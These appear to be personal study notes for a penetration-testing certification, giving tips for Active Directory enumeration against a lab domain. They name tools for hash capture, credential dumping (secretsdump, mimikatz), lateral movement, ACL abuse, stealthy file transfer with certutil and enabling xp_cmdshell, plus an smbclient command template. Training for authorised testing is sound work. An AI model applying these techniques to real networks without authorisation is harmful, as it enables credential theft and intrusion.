- Develop an AD methodology so as not to miss an enum steps - Enum is very iterative in AD - Basically redo all enum once we have new creds - Check password policy and defender status - Try `responder` or `inveigh` from different machine/account POVs - We may get more hits with a higher privileged account - Have alternative tools when things error out, hang, or don't work > it may be a false negative - For instance even though `nxc winrm` worked, `evil-winrm` did not for one machine - `impacket-psexec` and `psexec.py` leverage uses SMB - `wmiexec.py`, `atexec.py`, `smbexec.py` are other options to try - `bloodyAD` is primo for ACL abuse - we can target specific users with `secretsdump.py` and `mimkatz` - If we don't have access to `PowerShell` or we want to be stealthy, `certutil` is great for moving tools to a Windows host - `mssqlclient.py` is much better than `sqsh` - See [[5 - CPTS Notes/7 - Attacking Common Services/4 - SQL DBs (1433,3306)|4 - SQL DBs (1433,3306)]]]] to enable `xp_cmdshell` - Use `-c` flag with `smbclient` to execute commands such as `dir`, `cd`, and `get` - chain commands with semicolons like: `smbclinet -U inlanefreight.local/alfred%<password> \\\\<target_ip>\\share "-c cd subfolder; mget *.txt` - Use `-m` flag with `smbclient` to enforce protocol version - For example, `-m SMB2` and `-m SMB3` - Whiteboard helps to visualize the attack space - Also helpful to list out ideas to come back to when breaking overtime or for a meal - Below is the visual for Part II ![[images/IMG_5393.jpg]]